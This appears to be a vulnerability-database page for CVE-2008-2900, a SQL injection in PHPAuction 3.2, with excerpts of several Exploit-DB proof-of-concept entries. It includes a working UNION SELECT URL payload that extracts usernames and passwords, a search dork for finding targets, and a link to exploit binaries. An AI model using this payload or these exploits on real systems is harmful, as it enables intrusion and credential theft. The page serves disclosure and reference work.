CVE-2008-2900
published 2008-06-27CVE-2008-2900: SQL injection vulnerability in item.php in PHPAuction 3.2 allows remote attackers to execute arbitrary SQL commands via the id parameter.
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.3th percentile
SQL injection vulnerability in item.php in PHPAuction 3.2 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpauction | phpauction | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
EasyMail Quicksoft 6.0.2.0 - CreateStore ActiveX Code Execution (PoC)
exploitdb·2009-09-15
CVE-2008-6447 EasyMail Quicksoft 6.0.2.0 - CreateStore ActiveX Code Execution (PoC)
EasyMail Quicksoft 6.0.2.0 - CreateStore ActiveX Code Execution (PoC)
---
#####################################################################################
Application: EasyMail Quicksoft 6.0.2.0
Platforms: Windows XP Professional French SP2
crash: IE 6.0.2900.2180
Exploitation: remote Code Execution
Date: 2009-08-24
Author: Francis Provencher (Protek Research Lab's)
#####################################################################################
1) Introduction
2) Technical details and bug
3) The Code
#####################################################################################
1) Introduction
Create, send, download, parse, print and store internet email messages in your classic windows application. Designed for Visual Basic, ASP, C++, Delphi, ColdFusion, P
Exploit-DB
Microsoft Internet Explorer - GDI+ (PoC) (MS08-052)
exploitdb·2008-09-28
CVE-2007-5348 Microsoft Internet Explorer - GDI+ (PoC) (MS08-052)
Microsoft Internet Explorer - GDI+ (PoC) (MS08-052)
---
ef\:* { behavior: url(#default#VML); }
MS08-052: GDI+ Vulnerability
Operating System: XP SP2
Internet Explorer Version: 6.0.2900.2180
Gdiplus.dll Version: 5.1.3102.2180
Credit:
John Smith,
Evil Fingers
Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability.txt
var focus_size = "-5, -4";
var focus_pos = ".1, .1";
var ef_oval = document.getElementById('ef_oval');
ef_oval.fill.focussize = focus_size;
ef_oval.fill.focusposition = focus_pos;
# milw0rm.com [2008-09-28]
Exploit-DB
Microsoft Windows - GDI (CreateDIBPatternBrushPt) Heap Overflow (PoC)
exploitdb·2008-08-29
CVE-2008-1083 Microsoft Windows - GDI (CreateDIBPatternBrushPt) Heap Overflow (PoC)
Microsoft Windows - GDI (CreateDIBPatternBrushPt) Heap Overflow (PoC)
---
CreateDIBPatternBrushPt Heap Overflow DOS
By Ac!dDrop
This was tested on
Windows XP Sp2
GDI32.dll 5.1.2600.3099
Internet explorer 6.0.2900.2180
Causes Explorer.exe to crash.
and causes Internet explorer to close silently.
This is work in progress , i am still trying to make it run arbitary code.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6330.rar (2008-EMF_DOS.rar)
# milw0rm.com [2008-08-29]
Exploit-DB
phpAuction 3.2.1 - 'item.php' SQL Injection
exploitdb·2008-06-21
CVE-2008-2900 phpAuction 3.2.1 - 'item.php' SQL Injection
phpAuction 3.2.1 - 'item.php' SQL Injection
---
#########################################################
#
# phpauction-gpl Version3.2 Version SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# hussin.x[at]hotmail[DoT]com =
# =
#========================================================
# HomE script : http://www.phpauction.net
#
# Demo : http://www.phpauction.net/phpauction-gpl-3.2/
#
#
# DorK : Copyright 2007, PHPAUCTION.NET
#
#
##########################################################
Exploit:
http://www.site.net/[Pats]/item.php?id=-1+%75%6E%69%6F%6E+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2
No writeups or analysis indexed.
2008-06-27
Published